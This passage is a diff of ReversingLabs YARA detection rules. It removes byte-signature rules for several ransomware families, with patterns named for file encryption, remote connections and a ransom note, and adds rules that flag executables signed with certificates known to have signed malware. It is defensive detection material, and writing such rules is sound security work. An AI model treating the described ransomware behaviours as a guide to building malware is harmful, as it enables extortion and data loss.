-            ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? 83
-            EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ??
-            ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ??
-            ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 95 ??
-            ?? ?? ?? 03 CA 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 2B C8 51 50 56 E8 ?? ?? ??
-            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
-            68
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "41:2a:b2:a5:0e:80:28:dd:cb:c4:99:dd:f4:5f:20:45" and 1479340800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0747F6A8C3542F954B113Fd98C7607Cf : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "de5fbb40-7d41-5f3e-97c9-a6882c19ebb5"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14584-L14600"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "9d5e5c98f3ef372532cfc4f544d5d3f620dc2e49d8b6e1c96df29d2a38042019"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "07:47:f6:a8:c3:54:2f:95:4b:11:3f:d9:8c:76:07:cf" and 1474329600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Gpcode : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2572B484Fa0A61Be7288D785D7Bda7D3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Gpcode ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "168833dd-44ab-59e1-a610-b9219b2907ff"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "b1d71baa-9100-512d-91f4-7286a740e5f2"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Gpcode.yara#L1-L67"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14602-L14618"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "329309873977f73a8ebe758018ebc8ba42e15c3c7cbb9a65865631d235f5bb48"
+		logic_hash = "d6b23ba706a640a1e76ad7ab0a70c845c9366ac8355eea5439f76f6993c9c6be"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GPCode"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$drive_loop = {
-            B9 19 00 00 00 BB 01 00 00 00 D3 E3 23 D8 74 ?? 80
-            C1 ?? 88 0D ?? ?? ?? ?? 80 E9 ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 59 58 49 7D
-        }
-		$encrypt_routine = {
-            FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? [0-10]
-            E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ?? FF 35 ?? ??
-            ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? [1-10] FF 35 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15)
-            ?? ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ??
-            [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ??
-            75 ?? [10-40] FF 35 ?? ?? ?? ?? FF 75 ?? E8
-        }
-		$set_ransom_wallpaper = {
-             0F B6 05 ?? ?? ?? ?? 83 F8 01 0F 85 ?? ?? ?? ??
-             B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 [2-20] 5F
-             59 25 ?? ?? ?? ?? C1 E8 ?? 83 C0 ?? AA E2 ?? 33
-             C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-             ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-             68 ?? ?? ?? ?? (E8 | FF 15)
-        }
-		$read_config_file = {
-            55 8B EC 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ??
-            ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 50 6A ??
-            E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? FF
-            75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
-            89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
-            89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04
-            33 C0 C9 C3 89 45 ?? 8B D8 FF 75 ?? FF 75 ?? FF 75
-            ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ??
-            6A ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C3 ?? 8B
-            45 ?? 83 E8 ?? 50 53 E8 ?? ?? ?? ?? 8A 03 A2 ?? ??
-            ?? ?? 83 C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $drive_loop and $encrypt_routine and $set_ransom_wallpaper and $read_config_file )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVA, OOO" and pe.signatures [ i ] . serial == "25:72:b4:84:fa:0a:61:be:72:88:d7:85:d7:bd:a7:d3" and 1495152000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Archiveus : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_6726Bd04204746C46857887F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Archiveus ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "89e5af93-1153-5367-a539-6af77c99c214"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "ef882d82-f535-57c3-9d45-8d47ecc7f607"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Archiveus.yara#L3-L50"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14620-L14636"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2b8a42b98ab3e8b97d2e226e979f342a6a72f21d8f068f59c21ad95764077f8a"
+		logic_hash = "11d25dff7e05e6f97725e919cc6c978d7f2e64a91cf04b72461c71d592dfc2dc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Archiveus"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$entry_point = {
-            68 ?? ?? 40 00 E8 ?? ?? ?? FF
-        }
-		$dump_instruction = {
-            8B 3D ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ??
-            50 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D7 FF 15 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 1D ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 50 51 FF D3 50 8D 55 ?? 8D
-            45 ?? 52 50 FF D3 50 FF 15
-        }
-		$extension_rule = {
-            8B 13 6A ?? 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? D9 85 ?? ?? ?? ?? DB 85 ?? ?? ??
-            ?? DD 9D ?? ?? ?? ?? DC 8D ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? DC 05 ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 89 45
-            ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF
-            15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ??
-            50 6A ?? 6A ?? 6A ?? FF 15
-        }
-		$instruction_string = "INSTRUCTIONS HOW TO GET YOUR FILES BACK.txt" wide
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $entry_point at pe.entry_point ) and $dump_instruction and $extension_rule and $instruction_string
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "67:26:bd:04:20:47:46:c4:68:57:88:7f" and 1474352405 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Marlboro : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4463D8B31E0F87C14233D4D0D2C487A0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Marlboro ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7cd3b436-47e3-5711-9b59-cef70efe3b45"
-		date = "2020-07-23"
-		modified = "2020-07-23"
+		id = "eefd6fa2-7ed7-51d0-bddd-90f0727a93cc"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Marlboro.yara#L1-L117"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14638-L14654"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d36c3cf52af47e9f638f58aabc19298e8c58831c3083f82e4c194319503eeaaa"
+		logic_hash = "04ce664fceb4a617294e860d5364d8a4ce8e055fd2baebb8be69f258d9c70ac7"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Marlboro"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$ping_apnic = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57
-            C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_server_connection_1 = {
-            BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B
-            C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ??
-            50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
-        }
-		$remote_server_connection_2 = {
-            84 C0 74 ?? B3 ?? EB ?? 32 DB C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D
-            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ??
-            ?? 74 ?? 8D 80 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? [0-3] 8B 85 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6
-            45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B
-            01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0
-        }
-		$remote_server_connection_3 = {
-            50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49
-            ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ?? 83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F
-            43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ??
-            EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94 C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 FB ?? 72
-        }
-		$remote_server_connection_4 = {
-            57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
-            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            C6 EB ?? 8B 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33
-            CD E8 ?? ?? ?? ?? 8B E5 5D
-        }
-		$encrypt_file = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 51 C7 45 ?? ?? ?? ?? ?? 8D 55 ??
-            8B 35 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 8D 8D ?? ?? ??
-            ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BF ?? ?? ?? ??
-            8B 40 ?? 75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 0B C7 EB ?? 03 C8 33 C0 39
-            41 ?? 0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 8D 8D ??
-            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
-            75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? EB ?? 03 C8 33 C0 39 41 ??
-            0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 83 EC
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 8D ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8D 64 24 ?? 51 8D 55 ??
-            8B CE E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45
-            ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 74 ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03
-            C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8
-            8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D
-            45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
-            C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ??
-            ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ??
-            ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41
-            ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
-            C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ??
-            ?? ?? 8D 45 ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF
-            75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? C7 45 ?? ?? ??
-            ?? ?? 66 89 45 ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ??
-            ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $ping_apnic and $remote_server_connection_1 and $remote_server_connection_2 and $remote_server_connection_3 and $remote_server_connection_4 and $encrypt_file
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "44:63:d8:b3:1e:0f:87:c1:42:33:d4:d0:d2:c4:87:a0" and 1477612800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sifreli : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_387982605E542D6D52F231Ca6F5657Cc : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sifreli ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "974f81e2-6907-54da-97e3-3116c41b5ed4"
-		date = "2020-10-08"
-		modified = "2020-10-08"
+		id = "2d5731e1-b18b-544e-ae14-40d70b679618"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sifreli.yara#L1-L119"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14656-L14672"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "48f6cc678bea81afece0ae203fb27b61e2c6e4f7188a3bd260190f568c9a8a06"
+		logic_hash = "d55cfd45bc0d330c0ed433a882874e4633ffbaa0d68288bea9058fe269d75ed9"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sifreli"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 83 EC ?? 53 56 57 8B 7D ?? 8B C7 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ??
-            2B C2 D1 F8 8D 44 00 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 A1 ?? ?? ?? ??
-            6A ?? 50 FF D6 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ??
-            ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 51 FF D6 8B F8 85 FF 0F 84 ?? ?? ??
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 3D ?? ??
-            ?? ?? 1B C0 40 A3 ?? ?? ?? ?? EB ?? A1 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 50 53 FF 15
-            ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 F6 07 ?? 74
-            ?? BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 47 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66
-            8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 33 DB EB ??
-            1B C0 83 D8 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? 8D 47 ?? 8D 49 ?? 66 8B 10 66 3B 11 75 ??
